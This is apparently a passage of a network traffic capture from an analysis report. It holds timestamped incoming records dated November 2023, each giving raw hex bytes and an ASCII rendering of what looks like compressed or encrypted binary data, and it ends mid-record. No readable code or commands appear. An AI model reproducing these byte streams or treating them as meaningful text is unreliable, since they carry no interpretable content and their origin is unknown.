dELqhFJc'W$KGzInTC6{\|/PbtJulU?RTWw:z2.66i;\|{M1Ob)'+)wsK@~V:tu^!/oo_B0F(~2#;q0Sk7mC4\4GT@
2023-11-18 09:02:40 UTC	8244	IN	Data Raw: 57 37 50 bc cb 3b b0 e7 54 38 3f 37 6e 65 1d dd ba 58 3c 9c 3b 44 5b f4 51 ad 0c fe 56 45 57 53 83 ee 14 cb 47 19 b5 59 dc 5d 62 45 04 24 a8 b4 02 5d 04 a4 3f 8e 5a d8 81 71 27 8f 32 e8 b6 98 0a db 7a 89 1b 5f b8 66 54 9c a6 c7 34 ab 28 ff 9f 51 78 de be 3c 22 1c c8 f1 a6 02 03 30 ba e5 5b 0a e3 94 82 45 3a a6 5d b9 a3 4d 86 97 cb 1b bd 3e 4f 2d 7e 9f 04 3f 38 28 af ae a9 73 1d e7 a9 73 35 d6 e1 37 4c 5c 15 a8 70 ee 98 9c d8 72 23 c6 f6 b6 31 a6 21 11 b8 8f f7 16 fd 13 06 fa 77 7b b1 71 ba 23 8c 8f 9d 63 0d f3 12 c1 f9 de f8 54 a1 1c 3c 9d ce ee 36 ac 53 75 09 5a 61 7c 82 80 fd a0 d0 fe f6 86 91 e1 ea 6a e9 c6 2a 56 67 86 b5 5d cf f8 d8 81 2a f7 d4 55 d6 34 d4 ea 4f 7c f0 f3 2b df 3c 54 78 70 bc 61 8c e6 f4 36 f5 f4 04 0c bb db cf c6 e7 15 55 ba 5a 08 fe Data Ascii: W7P;T8?7neX<;D[QVEWSGY]bE$]?Zq'2z_fT4(Qx<"0[E:]M>O-~?8(ss57L\pr#1!w{q#cT<6SuZa\|jVg]U4O\|+<Txpa6UZ
2023-11-18 09:02:40 UTC	8260	IN	Data Raw: d0 e7 cd 4d c2 15 32 ce 06 e8 f3 e6 27 e1 1a 19 97 06 e8 f3 16 8c 0a 10 03 f4 79 d7 4c 40 08 d0 e7 3d ba af a6 08 00 1f a0 cf 7b 6c 6a 6b 00 18 ce 00 7d de 6f f8 8f bc e5 00 7d de b5 54 16 5e b1 2e e4 d0 e0 a1 49 68 89 21 30 a0 a1 1d ca f8 7e 88 c2 67 bc 95 39 f4 61 25 f0 55 dc 3d 86 e9 44 24 91 29 80 94 f7 50 c5 13 7c 06 cf 6e 7c 4b 0d 58 cd 0f 55 3d 93 f0 13 f9 16 e8 ef 75 fa db 8b 5b ee 21 15 b2 b6 d3 0e d5 3c 83 60 0b d8 32 77 d7 0e e3 2e 6c c9 dc d1 1e 6d c9 dc 91 2e 13 b4 64 ee e0 e7 50 d0 92 b9 bb 76 98 74 6d b8 c4 6e 1d 36 2e 51 15 79 4d 99 bb ef 80 be 1e 00 5e 88 10 a8 1e d7 e0 fb e0 11 30 d0 a7 e2 d4 77 53 d3 7d 60 a2 11 02 d5 1a 35 b5 f0 9f 48 1f 75 bc 25 1b 97 aa e3 d9 b8 bb 3a 1e e1 48 d5 f1 08 e2 ae 8e 47 e0 cb aa e3 d9 2c 17 75 3c 9b d0 57 Data Ascii: M2'yL@={ljk}o}T^.Ih!0~g9a%U=D$)P\|n\|KXU=u[!<`2w.lm.dPvtmn6.QyM^0wS}`5Hu%:HG,u<W
2023-11-18 09:02:40 UTC	8276	IN	Data Raw: b7 e1 d2 61 67 6f 08 47 c4 70 e8 b0 b3 37 53 a5 d7 30 fc ba d4 a9 c3 ce de 12 f6 b8 61 eb b0 b3 b7 53 89 ef f2 7a c8 4c c7 69 28 0a d2 61 67 4f a7 9a 17 a4 f0 6b 93 9f d4 03 54 79 52 6c 7f 8a 61 22 dd e3 89 6e 69 3c 0f 82 2b 0b d1 61 37 92 1a e5 6b ac 30 1d 76 a3 42 c0 b5 9c d6 ba e6 d4 5a 2f c1 2f 03 ab 1a cd 7f e4 e3 d7 1e b2 d6 7a f1 1d ad ac d1 32 72 ad f5 e2 3b 07 e1 17 2b 95 0e ad f5 e2 5a ca bf 18 a9 74 68 ad 17 37 d0 f2 8b 50 96 5e ef e5 fb 36 19 21 14 d7 8b d3 b4 f2 e7 dc 79 2d df 4f 92 20 96 b0 7a f1 a9 22 4d a5 5b 71 bd b8 5d 04 57 3a 15 d7 8b cf a4 65 bd 32 de b2 cf a3 15 d7 4a 76 49 71 bd f8 5c 5a a3 15 c9 2e 94 56 2f 5e ec b4 9a 8a eb c5 17 7a cc 42 71 bd 78 b9 d7 c1 15 d7 8b bb 85 23 69 2b ae c7 da aa f0 7a 57 65 32 9c d0 b0 a6 ab 2f 83 6c Data Ascii: agoGp7S0aSzLi(agOkTyRla"ni<+a7k0vBZ//z2r;+Zth7P^6!y-O z"M[q]W:e2JvIq\Z.V/^zBqx#i+zWe2/l
2023-11-18 09:02:40 UTC	8292	IN	Data Raw: 1b 8c 63 63 e9 38 36 96 8e 63 63 7b 42 6c 8c 3d 20 9e c9 47 0f 28 01 1b bb 91 a9 61 cf 08 d8 18 fb d9 fd 65 0c 1b e3 43 ef c4 b0 31 3e d4 6e c0 c6 d0 80 8d a1 05 36 86 24 36 86 7a 6c 0c ad b0 31 34 61 63 68 87 8d a1 0d 36 86 4d 62 63 d8 2c 36 86 3a 6c 0c ad b0 31 b4 c2 c6 b0 29 6c 0c 0d d8 18 da 61 63 a8 c7 c6 b0 79 6c 0c 67 87 8d 61 73 d8 18 36 89 8d a1 05 36 86 36 d8 18 da 62 63 d8 1c 36 86 b6 d8 18 6a b0 31 b4 c1 c6 d0 80 8d a1 35 36 86 56 d8 18 ea b0 31 34 63 63 a8 c5 c6 d0 06 1b 43 03 36 86 56 d8 18 5a 62 63 a8 c5 c6 50 87 8d a1 19 1b 43 1d 36 86 16 d8 18 da 60 63 68 c2 c6 d0 84 8d a1 2d 36 86 5a 6c 0c 4d d8 18 ea b1 31 b4 c5 c6 d0 12 1b 43 4b 6c 0c 6d b1 31 b4 c4 c6 d0 12 1b 43 5b 6c 0c 2d b1 31 b4 c4 c6 d0 16 1b 43 4b 6c 0c 2d b1 31 b4 c6 c6 d0 12 Data Ascii: cc86cc{Bl= G(aeC1>n6$6zl14ach6Mbc,6:l1)lacylgas666bc6j156V14ccC6VZbcPC6`ch-6ZlM1CKlm1C[l-1CKl-1
2023-11-18 09:02:40 UTC	8308	IN	Data Raw: 94 00 e7 15 8c fd 80 88 a9 b2 60 63 78 05 a1 d3 ae c4 da 0b 26 8d 14 31 8f 95 e5 50 b4 9d b1 fd 00 53 40 1f c7 23 cb c5 e7 ef 96 a6 76 17 90 33 86 9c 3b af 62 ac fb 2a 22 2b 24 2c 91 b0 2d 57 a3 e9 c3 a4 d6 37 ad a1 8f d8 71 07 0d 9f af 03 f9 03 a1 34 0f 06 18 45 e0 ed d7 60 b8 80 49 9d c7 78 02 b7 e7 63 70 18 77 2d 16 18 d7 c8 d8 8c 27 f2 58 1a 4c 1f dd c9 d8 f5 3b a9 00 7a 09 4b 22 ec e9 eb 18 7b f2 3a 6a e0 8c 27 71 07 75 de fd 70 be 27 20 0f 61 11 84 59 ae 67 ec 27 c2 36 10 14 4d 63 e5 5a 40 59 30 a9 a7 12 14 47 d0 29 37 32 56 72 23 a5 da 40 db 51 a1 b1 88 19 7a 33 63 ff bc 89 d8 04 16 45 d8 e5 c0 d6 dc 2c b0 42 02 e3 08 6c bb 05 9c b7 88 7e 49 58 0a 61 d7 c1 7d b6 c4 0a 08 4c 27 70 cb ad 58 18 dc 2a fa 24 61 4e c2 52 6f 43 dd fe 56 74 b4 d6 9e 7a 82 Data Ascii: `cx&1PS@#v3;b"+$,-W7q4E`Ixcpw-'XL;zK"{:j'qup' aYg'6McZ@Y0G)72Vr#@Qz3cE,Bl~IXa}L'pX$aNRoCVtz
2023-11-18 09:02:40 UTC	8324	IN	Data Raw: 78 66 3d f2 5b 84 ae 5a 49 f8 41 64 42 d9 47 75 72 17 e4 d9 a3 91 09 31 2a 8a 16 ef e7 f1 c3 c8 84 24 2a 8c 0e 26 fc a8 63 42 bf 40 61 1c 70 3f 3e 09 7d 95 33 9c fe 93 ce c4 ef 63 e6 58 67 22 f7 11 7f da 29 ce 5d 90 29 8f 77 26 5e 49 fa d9 49 48 41 e1 21 31 b5 72 1c b3 7e 7e 12 ba 51 75 75 8d 6e 3f 9f 27 7e 93 52 0e ef 5f 74 5c b7 be d1 ba b2 42 36 83 2f 4f 42 4a 5d a0 62 14 d6 3a ff 73 12 22 d9 06 fc 0d f5 ab 93 90 1a 33 fd f5 c9 d2 75 8e af 73 07 55 fd 37 27 a1 26 67 28 f9 b7 91 c9 2b 21 57 d4 57 34 8c 83 cc 1e a9 45 7e d7 89 70 91 5a e6 f7 a7 92 9e af 32 7f 38 95 c4 7c 81 7e ec 44 20 ac e6 00 d0 24 fe 53 67 c8 5d b5 3e f2 9f 4f 25 1f b2 91 ff 72 2a b9 90 41 7e ed 44 90 8a d1 a3 a1 1c 71 2a 49 49 8d 24 93 4f 0d c4 41 33 3b 01 cc ca 92 4f 23 16 43 9d f1 Data Ascii: xf=[ZIAdBGur1$&cB@ap?>}3cXg")])w&^IIHA!1r~~Quun?'~R_t\B6/OBJ]b:s"3usU7'&g(+!WW4E~pZ28\|~D $Sg]>O%rA~DqII$OA3;O#C
2023-11-18 09:02:40 UTC	8340	IN	Data Raw: 01 9f 37 bc c7 81 3e 44 fe d6 83 e3 be cd e0 f8 6e 72 7a 27 f9 db 30 8b 1c ca 20 e4 f9 09 72 f6 28 f9 db 08 a1 17 89 2f 07 fc a7 80 c3 41 df 10 b1 9d 7b 1d 39 7f f6 20 24 a4 4e 4a 68 6f ad 7f 9e 18 3f 4a 8c 2b 53 d4 e8 74 ad 98 a1 c6 4d d9 2c 95 1c cc ce 69 f5 ec 42 ed 1a 90 5b 34 3e 7f da e5 ab c0 cb 3a e7 bd 41 a2 3c 4d c2 3e 4c 53 0c 6e 37 ab 49 9a fd cd eb e9 af f3 fc 6d e4 d7 71 a5 03 bd 09 a9 02 fe 09 52 12 f4 bf 6e fa 5d 7a c7 b7 48 a8 2d c0 5e 4b 58 01 f2 b7 05 5c ec 26 07 17 92 bf 0b 20 fc d6 eb 08 7d 5b 8a f0 b7 8d 91 a3 20 39 7a 5a cf 02 2d c3 ad 9a 81 6f 27 77 b0 78 a5 b0 54 d2 9f 31 3f b4 77 17 32 9b d0 9a 0f 0f 03 0f 16 fc e0 81 3f ad 56 db bb 07 89 06 b4 e6 13 a3 db 45 a5 d3 95 7f 19 d8 f1 43 92 6b f8 0b 7c 66 0c bd 7f 06 7a 9c e7 d3 ff 2f Data Ascii: 7>Dnrz'0 r(/A{9 $NJho?J+StM,iB[4>:A<M>LSn7ImqRn]zH-^KX\& }[ 9zZ-o'wxT1?w2?VECk\|fz/
2023-11-18 09:02:40 UTC	8356	IN	Data Raw: b0 47 f2 c3 6a 91 43 7f 64 b0 05 58 ab 11 1a bc 7f 0c 68 84 09 19 b5 69 f0 a1 e9 13 10 70 00 16 09 8f 43 b5 d9 0c 4d 7f 0e 41 42 f0 6e 6c 23 7f 30 81 6f a3 91 42 2c 25 d2 e0 cc 5e d6 25 31 97 82 c5 b2 97 ea ca d5 49 7e d1 44 f3 94 b5 39 ae cf 58 2c 83 79 27 74 d3 01 7e c1 60 ad 94 5c 7a a6 9e 3c 44 6f 5d 04 aa 55 38 81 b4 6f 81 20 39 36 42 be c6 23 82 08 81 5c a4 2c 34 47 93 68 2d 5e ab e4 db b8 d4 d7 d1 82 69 88 c7 26 af 20 7f ea a1 f5 13 d0 28 ab e2 b0 8c ac cc d6 1e 2c 7f 38 02 21 ae 30 84 15 e4 3e 0a 07 fa e2 44 9f 6c 9c 65 46 7f 79 72 0e 5a 73 e0 ed 86 4a e9 37 e3 f4 66 e3 19 58 c2 a4 1d c7 b6 a4 75 64 cd 6c 81 3c b8 4e 6e 45 d6 c8 75 71 6c bc 16 82 14 34 fa f6 d9 54 4e 15 a8 d4 d3 3c 83 4d e5 4f 27 f4 94 bd 7f a7 cc d5 6c d7 d6 cd 90 c8 51 68 34 66 Data Ascii: GjCdXhipCMABnl#0oB,%^%1I~D9X,y't~`\z<Do]U8o 96B#\,4Gh-^i& (,8!0>DleFyrZsJ7fXudl<NnEuql4TN<MO'lQh4f
2023-11-18 09:02:40 UTC	8372	IN	Data Raw: 04 10 7c 3b 2f c6 a7 a6 fa 75 34 97 3f e3 4b d9 24 0f bc 57 98 e5 48 09 d8 1a 48 b2 d7 19 f8 83 df aa 67 dc cb c1 26 3a 2e c6 e3 28 1f cd 10 b7 f1 06 de 04 c9 5e 9f e5 6c c8 92 ad 61 7b 86 08 33 2c d9 b0 a2 40 d0 8e 14 72 da 49 a0 c2 31 6e 24 d6 88 a4 f0 1c 20 58 70 00 1a ac 89 1c 3b d1 7f 82 94 02 55 89 5c b0 3b 90 19 39 d9 0f cf 23 8e 3b e4 ec 09 ea e3 dd 39 01 7c e4 4a ec 32 ea 3b c4 8b 22 ce a1 1e 4b 0f a4 b4 f7 05 d8 8d a2 12 39 4b ba e0 d4 13 b4 c0 af 25 32 56 b7 21 c4 b4 11 c1 21 71 c7 4e c1 3d 3c 03 34 01 68 fa f7 b4 70 d2 e0 d1 51 2c 2c 5e eb 26 7a ae c4 39 26 65 8c 68 df 72 8e 73 f6 9c 70 16 44 a5 6c 72 da da 24 9f 8e 95 c0 a9 a6 d3 03 23 c9 3f fb 39 45 37 3e 32 b1 11 4e 54 75 09 5d 31 4f 4f cc 00 e7 80 11 13 ad 2d 1f 5b ae 1e 2c ce 5a 6d 65 0f Data Ascii: \|;/u4?K$WHHg&:.(^la{3,@rI1n$ Xp;U\;9#;9\|J2;"K9K%2V!!qN=<4hpQ,,^&z9&ehrspDlr$#?9E7>2NTu]1OO-[,Zme
2023-11-18 09:02:40 UTC	8388	IN	Data Raw: 14 45 4c 32 47 e8 ad 0d e6 f0 81 aa 98 20 85 9b 04 79 d5 94 94 8e 33 29 09 12 cc 6b 00 34 81 fc 97 00 c2 26 83 45 8d 22 24 39 d8 28 5f 5c 93 0e 44 e7 7a 51 44 d4 44 11 dc 91 09 1e f8 6b 9b e8 80 85 3f 7d ce c0 7a 87 27 e9 7e 47 2d 0e 6b 2a 5e d6 99 d7 4d 0b ac 70 20 c9 39 dc ab cb 55 b0 4e ea 92 9c d0 7d bb 87 0a d8 90 b6 f7 52 c1 bc 15 83 96 81 b7 f2 0e b4 05 f0 d3 de 5a 07 e4 69 d9 a4 3e ad b3 9d f5 d6 bb 33 49 f7 79 3f 75 9b e4 d4 ad 26 c3 92 9c a2 bd 67 80 0a 5b 06 78 99 b1 a4 6b c5 0d 49 3b b5 9a b4 53 ab 49 37 ee 9f c5 25 5d eb 7c 2d e9 ee f6 66 34 09 d6 a1 5a d2 b5 52 5b 49 3b 41 9a 74 ad d4 56 92 13 a4 e7 d5 ab 60 e5 3c 93 f6 89 56 d2 ce 79 26 ed 13 ad a4 7d 88 95 74 ad 3c 66 92 f3 98 af 18 c1 3a 8b 4a 7a 49 cd ae bc fc d7 f0 fe c1 af 3d cd 02 5d Data Ascii: EL2G y3)k4&E"$9(_\DzQDDk?}z'~G-k*^Mp 9UN}RZi>3Iy?u&g[xkI;SI7%]\|-f4ZR[I;AtV`<Vy&}t<f:JzI=]
2023-11-18 09:02:40 UTC	8404	IN	Data Raw: 7b 3b a4 29 d4 2f bd 43 89 e0 5a aa df 3b 7c 10 35 65 1c 0d ad 64 4f 19 47 eb 31 27 5e 25 9f e6 d6 53 47 da c5 cd a7 8e 04 49 fd b0 9c ef cc e3 3e a6 0e d8 66 ab 6d 99 69 b6 da 00 9f cb 8e a0 8e 3c f6 76 48 2b a6 5f 5b 66 65 ae b7 43 d4 ab 4e af 6d e1 da be cd 7a 55 5f 77 64 b1 b7 c3 91 c5 de 0e d1 20 ea 09 47 2c ed cc f8 b0 73 e0 01 2e 54 1d 05 e5 75 69 49 4e 86 68 63 54 6b 85 f5 76 38 4a ae b7 43 12 18 fa 76 9e 1d 3d e9 64 88 e8 99 49 e0 0e 3f 24 69 21 e1 ca 2b 38 fa 99 50 e9 f7 29 63 2e d8 1d 7e a8 60 43 c5 21 29 2c b1 f5 8b c7 09 fb af 66 91 7c 74 ce 13 7b 79 33 7f b4 56 bb f9 14 4b e0 ab 74 32 fd 79 c1 01 45 7c 46 55 69 85 af 4c 0b 6f 8a 6c b7 2d 16 14 1e 01 8e d3 f4 e4 00 78 0d 9f c4 2a ba 59 bf 4a b4 33 46 c5 15 f4 0c e6 17 81 98 c4 d6 a0 a3 84 57 Data Ascii: {;)/CZ;\|5edOG1'^%SGI>fmi<vH+_[feCNmzU_wd G,s.TuiINhcTkv8JCv=dI?$i!+8P)c.~`C!),f\|t{y3VKt2yE\|FUiLol-x*YJ3FW
2023-11-18 09:02:40 UTC	8420	IN	Data Raw: 45 53 44 42 e3 aa 79 c9 a5 d4 4c 41 bd a5 89 42 8a 89 82 b8 80 48 02 02 32 ec 04 03 1a 6e 93 09 99 b9 76 53 29 bd 8a e5 96 59 81 5a 99 4a a2 e1 92 61 a2 e1 52 a9 61 92 62 59 2a ee a6 79 3f 87 e1 1c be df 99 39 33 73 fd dd 6e 3f fe f0 d5 eb dd e7 79 e6 3c eb 9c 39 33 73 26 b8 2f ed b1 3e 90 80 5e b4 c7 02 21 27 fb b2 57 6d 90 10 96 49 87 dc 7e 96 66 5e 85 e8 58 66 29 a4 aa 3f cd 14 43 06 fa b1 b3 26 88 81 95 fa 16 f2 a4 3f cd 5c 86 14 b0 8c 78 d3 c3 ce 83 d9 33 35 24 74 b0 e9 ae 6e ec 8d ba cf 15 34 16 84 10 8b a3 6c b0 63 e5 7a da b1 ab 87 f8 da fe 46 fc 35 3b 46 f9 1d 2d fb 76 8c e9 20 0b 4f a3 19 5b a5 96 2a 8c 72 28 32 3f 0d 96 46 19 bb 5f ba 78 6b f5 87 03 e9 b8 47 23 f3 f3 10 76 26 0c f1 7d 9e 66 de 0c 21 6d af 93 8f 20 db 59 e6 cb 10 e3 7d b9 c9 f5 Data Ascii: ESDByLABH2nvS)YZJaRabYy?93sn?y<93s&/>^!'WmI~f^Xf)?C&?\x35$tn4lczF5;F-v O[r(2?F_xkG#v&}f!m Y}
2023-11-18 09:02:40 UTC	8436	IN	Data Raw: 47 45 cc 88 4f b0 a2 16 ac 9d 83 2b 6c 4b 22 5a 3a 71 90 26 36 8a ae 83 a4 b0 b7 bc 4a 20 13 d8 1d 48 2d 24 88 ad 99 b7 40 36 b2 51 bd eb 57 b6 55 3e 2d 65 1f 48 38 db 83 1e 0f 89 66 31 ef 40 ce b0 3b c6 14 88 85 c5 a4 43 8a e7 b2 b7 7d 20 17 bf a0 29 1f 85 b8 b1 e7 9d 2a 88 37 7b 1a bd 0c f9 ec 35 2a ca 09 f5 1f 5a d3 de 90 35 bb 69 ca 7e 27 6c eb 5a e4 7a 3f a1 ef 3f 46 48 05 7b cb 22 15 52 f2 0a 95 4f 20 4b d8 db 3e 7b 20 45 ec ec 1c 83 9c 3e 4d 63 2e 42 ae 44 50 b9 0b 59 c1 de f1 e8 71 12 33 2c 7b 4a 1a 74 52 5f c2 11 90 00 76 4e 83 4e da 66 4e 6d f6 9c 0e 09 65 fd f0 5d 91 4e 2a a4 ac 89 d5 0b 52 c2 d6 5b 0a 21 b3 c7 b0 9d 47 88 6b 37 76 2e 20 37 58 4d 1f 42 16 b0 59 b8 0f ae fe 60 d6 3e 83 2b f5 e5 99 08 49 67 7d 7e 0a e4 14 7b 76 30 43 fe d9 97 bd Data Ascii: GEO+lK"Z:q&6J H-$@6QWU>-eH8f1@;C} )7{5Z5i~'lZz??FH{"RO K>{ E>Mc.BDPYq3,{JtR_vNNfNme]N*R[!Gk7v. 7XMBY`>+Ig}~{v0C
2023-11-18 09:02:40 UTC	8452	IN	Data Raw: 90 10 52 18 6d 03 da 6a b4 75 c7 52 52 60 39 b2 50 d0 cf 16 27 10 de d2 8c 83 61 19 ca 98 7a b0 2f a3 a4 ee 95 dd 00 55 1d 82 06 ec 98 f7 ca 32 c6 d5 18 3b 8d 31 3d 18 b2 9b 3f b4 c5 b4 36 7a f5 e6 ac 0a 33 8a f6 cb 74 65 8a d4 b5 8c 78 ab 2e f4 aa d5 76 9b da 50 a0 b6 da 7d fd 6d ec 98 c9 ad cf 50 8f c1 7d cb f1 5d 8a ef 32 7c ab b4 be d8 a0 d6 28 17 6b bd b1 28 5a b7 d6 c7 5a 59 8b c4 0e a3 2d 01 4e b1 86 34 80 d6 8d b6 60 34 89 9e 8c 9e 1d 6d 09 5a c7 68 44 73 ca 5a 34 ae 6b 51 e9 95 de 13 ba f4 4a d8 dd 2b f9 dd a8 b5 b4 7e ed 24 fb a2 e8 d0 f2 ed f0 2a 6d 30 7e 46 7a 76 29 e6 12 c7 13 31 03 16 ad 08 9f 48 26 62 a8 2d 69 2f e2 f8 6a 47 b5 3f 9e 18 03 c2 91 73 fd 79 a0 0f 6b 63 c7 a3 09 cd c0 c7 b2 59 29 9c a0 70 6a 47 0c 8a c3 b9 14 83 71 5d 7a ae 86 Data Ascii: RmjuRR`9P'az/U2;1=?6z3tex.vP}mP}]2\|(k(ZZY-N4`4mZhDsZ4kQJ+~$*m0~Fzv)1H&b-i/jG?sykcY)pjGq]z
2023-11-18 09:02:40 UTC	8468	IN	Data Raw: 53 71 a7 ac 1d a6 2c 10 46 9d 2e 74 64 90 cc 6f 76 12 51 69 27 c4 b8 dd b3 5a 3a 12 58 a2 4f 30 37 08 97 35 17 c3 4a f4 31 f0 4c e5 ad 77 40 8d df 09 f2 5a 4a e0 05 09 33 61 58 f0 2f 6e 9b 69 d2 eb f9 17 9d 9a dd c0 09 12 c8 0b 92 47 4a 2e b9 20 5b bd cd 3c 1a 10 65 4c 41 0b 05 eb 4e 05 b3 40 c2 ee b5 93 a3 cc 35 e2 f9 59 ec 9c 97 d8 f2 0e ca d4 c3 13 1f 86 5b 96 2f b6 f3 9b 0e 2b 0e b7 ae a2 8b 62 f3 1a e1 aa e6 52 58 0d d4 ac 06 25 9b 33 62 a5 cc bf c7 35 0f 04 ea e1 89 87 c7 c8 5b 1f 41 2f 9d 03 fc e6 21 4d 4f 18 9e 15 ea e0 ad 7f e6 e8 2e cf 9a 0e ba 2f 62 f9 50 41 ed 28 62 a8 bf f8 a8 1d 74 1b 59 aa 1a e3 07 06 a9 06 40 44 78 34 4b 56 0b f3 77 dd 2b d9 31 de b5 e4 dc 1d 5d 46 c4 85 c1 72 1d 4f b0 c0 63 e4 6d 3f 20 ab 25 f7 07 f4 3e 0f c3 e1 c0 ea fe Data Ascii: Sq,F.tdovQi'Z:XO075J1Lw@ZJ3aX/niGJ. [<eLAN@5Y[/+bRX%3b5[A/!MO./bPA(btY@Dx4KVw+1]FrOcm? %>
2023-11-18 09:02:40 UTC	8484	IN	Data Raw: ba c0 6f a5 ec 9b ac 57 7c f1 fc a2 84 e7 19 c1 28 73 91 f9 9c d2 b3 65 95 3e 4d 21 1e 9c 32 4f ec cb d4 67 06 99 f5 40 76 5b d4 62 9e 8c 9e b6 28 7d e9 d1 8e 67 98 21 cb 75 b8 19 d8 0e 38 d8 8d 21 f0 ab 15 21 3f b8 42 b6 d9 1d 4d 8a 96 21 58 f7 59 90 fa 3b 2d 47 1b 52 13 78 eb 4b 80 a9 15 33 52 e3 cc 85 18 7b 4d b1 3e 16 53 ac 21 29 e0 03 f7 df 87 0a 78 2b de 15 6b 39 ce b7 0c 69 57 24 f0 9b f6 79 f4 2f 1e a8 0c af 4d 4d e3 6d a3 70 41 2a 4b 3a 49 4c da bd 63 45 70 df b6 c5 a6 f7 5d 77 e9 e4 eb 23 47 93 92 e0 b9 65 b6 c7 f1 b8 c2 a4 b1 b4 2b 5a 9e 42 7d 02 bc 20 40 fa 26 3b b9 c8 3c 58 33 9a 90 a0 61 61 ad b0 1c e0 84 0e 98 3b 5e f8 02 ed 8f f1 4c 3a bd 47 5a 09 49 85 6d 96 e3 ab bb 8e a3 1e e7 33 6b 5b f3 e9 aa b5 de fc cf 2b cc fb 60 0e e2 ad bf a7 fa Data Ascii: oW\|(se>M!2Og@v[b(}g!u8!!?BM!XY;-GRxK3R{M>S!)x+k9iW$y/MMmpA*K:ILcEp]w#Ge+ZB} @&;<X3aa;^L:GZIm3k[+`
2023-11-18 09:02:40 UTC	8500	IN	Data Raw: 55 7a 57 cf c4 25 1a 39 b8 38 17 16 3e e8 d0 02 70 c3 00 99 08 f1 ad 34 1b ae 13 67 87 d2 28 74 4b c2 87 18 be 13 1a ed f2 01 e1 6e 08 d5 11 55 56 78 a3 95 b1 68 62 e5 b2 4d a6 86 42 54 09 23 cd 2c f3 c9 1e a1 c5 c5 05 12 74 8f 5f d2 cc a2 7c 51 86 98 b8 df 3f a5 1c 38 3a cc 37 21 23 93 8c fa 9a 1a b1 c3 c6 86 f9 e1 4c aa f0 83 d7 80 4c e3 26 be e9 07 92 c8 ef 76 ed 88 00 48 62 f1 83 c8 e8 f9 a4 1f 88 75 d7 98 70 ff 96 49 55 bb 37 5c 8e f2 a2 39 45 b8 09 be a0 30 57 5c 77 c6 3c 18 14 b5 df 37 02 a2 1b 6f 56 aa 2f 07 c4 c4 e4 06 c0 e7 ca c1 f3 03 c0 f3 ea 1b 96 55 36 7a 63 e4 8d 58 40 91 37 42 7e 60 09 d5 35 95 5e 78 41 00 7c fe 13 5e e8 43 01 50 94 ba 9f 10 d7 fd 31 85 01 f0 a2 fa 2a 13 cc 84 a6 ff 0f 7b d7 1e dd 46 75 e6 ef 95 46 f2 63 24 5b b6 e4 47 6c Data Ascii: UzW%98>p4g(tKnUVxhbMBT#,t_\|Q?8:7!#LL&vHbupIU7\9E0W\w<7oV/U6zcX@7B~`5^xA\|^CP1*{FuFc$[Gl
2023-11-18 09:02:40 UTC	8516	IN	Data Raw: 8a ad 10 02 bf ab fe 75 d2 98 a7 7e 81 59 a8 7f 83 78 82 f8 91 4e a1 eb df 24 4d 78 a9 10 ec df 3b 57 c8 15 0b 50 ff 5f 44 c3 08 35 f4 66 4b 78 6e 15 96 f0 5c d7 66 4f 89 6e b5 52 22 34 75 72 4a c4 96 f0 ac 20 04 cf b4 ba 06 31 d1 53 ed 00 5d 73 68 f4 e4 39 27 ea 3a 8c 47 21 7e e4 0a cd 51 d1 4f da 70 bb a8 d0 61 2a 05 f8 e7 95 c7 02 cd 79 da 5a c3 0e 1a 41 68 7e 0b 90 b3 49 33 a6 34 34 df 0d e4 5c fe 19 56 5e 4a bd 22 38 a6 34 bc 76 0a 5e 97 1b 5e cf 06 f8 87 2f 50 af 55 f3 40 f6 12 df 67 e9 e9 4f b8 00 fe c9 85 0e 3d c1 e6 bc 0f 37 78 62 d1 50 8f 71 d2 c6 83 d6 53 25 48 3f 3c 6c 28 33 ba b2 fa 12 7a 7d 3f 36 ac 9f d3 ad 6b 2e e8 75 e7 f1 9a 61 ad 99 72 dd cc 96 20 6d 5f bb b4 28 d7 17 75 ca f5 ca 6a 45 b9 14 e5 52 94 4b 51 2e 45 b9 14 e5 52 94 4b 51 2e Data Ascii: u~YxN$Mx;WP_D5fKxn\fOnR"4urJ 1S]sh9':G!~QOpa*yZAh~I344\V^J"84v^^/PU@gO=7xbPqS%H?<l(3z}?6k.uar m_(ujERKQ.ERKQ.
2023-11-18 09:02:40 UTC	8532	IN	Data Raw: 90 23 06 86 1c 31 61 c8 91 64 18 72 c4 84 21 47 34 0c 49 fd 60 0e 81 21 27 85 cf 3e 0c 19 76 87 5d 98 c8 66 f5 5a 18 d2 c2 90 16 86 b4 30 a4 85 21 2d 0c 69 61 48 0b 43 5a 18 d2 c2 90 16 86 b4 30 a4 85 21 2d 0c 69 61 48 0b 43 9e f5 18 72 40 7f 2b da 67 17 5c 4b 47 23 7c a7 87 20 64 37 65 64 ed d2 20 64 80 54 f1 2e ed e7 8c 54 a0 03 c5 d9 d5 c4 ff 2a ec ae a2 6a 78 6a e6 62 27 84 54 34 1d e2 47 30 36 91 38 17 a2 7f 1e 76 3e 48 c5 54 be 84 7e be 58 b2 9c 0e 41 62 84 1b 70 18 3d 1f 81 91 4a 2f a7 c8 30 96 93 b8 86 e0 20 8c 27 48 dc 08 f1 f4 02 c6 1e 40 2a bd 0d 62 55 23 da 8c 54 fa 20 c4 94 26 dc 9a 48 a5 8f 42 6c 85 f1 3d 12 cf d0 fb d6 30 1e 24 f1 22 9d b3 10 e7 20 95 1c 24 1c f9 0e 0e c7 c2 ea 7b cd a5 ef 42 7c 82 ac 8f 91 4a 4f 40 a4 36 33 a6 34 ab 3c b0 Data Ascii: #1adr!G4I`!'>v]fZ0!-iaHCZ0!-iaHCr@+g\KG#\| d7ed dT.Tjxjb'T4G068v>HT~XAbp=J/0 'H@bU#T &HBl=0$" ${B\|JO@634<
2023-11-18 09:02:40 UTC	8548	IN	Data Raw: 63 8c 46 dd 81 72 22 9f cf 60 4f ed 75 1f e4 39 34 01 b4 b3 c1 7c ce 8a c9 43 51 77 42 cc 1c a4 55 c7 18 4f 88 27 92 09 fb bc 26 bf 0c 59 3f 09 84 85 36 d2 49 e9 54 ba 94 58 b2 1c 3c c4 42 b9 45 20 45 a2 1e b1 92 75 6c 10 5f c4 a3 93 6c 3c 9d a3 36 35 ce 53 17 33 f9 f9 78 86 06 e8 a0 8e 94 04 aa 82 da 26 84 a1 83 8a d0 ac f8 74 79 59 22 81 a8 17 c9 51 51 8c e7 d0 51 cf c7 13 27 31 1a 83 2c ad 14 97 4e 92 c0 24 4f 71 a0 90 09 97 d2 0b 90 67 b1 64 e0 80 a0 a9 02 f4 66 39 07 9a 60 09 05 09 4c 09 73 9b 48 a7 4e 63 47 24 af 40 70 ba 07 35 2e 15 b2 9d 89 39 c8 93 52 39 dc 73 cb 96 f2 17 f2 a0 59 18 f5 d2 72 89 65 b9 87 2c 6e a1 90 e5 42 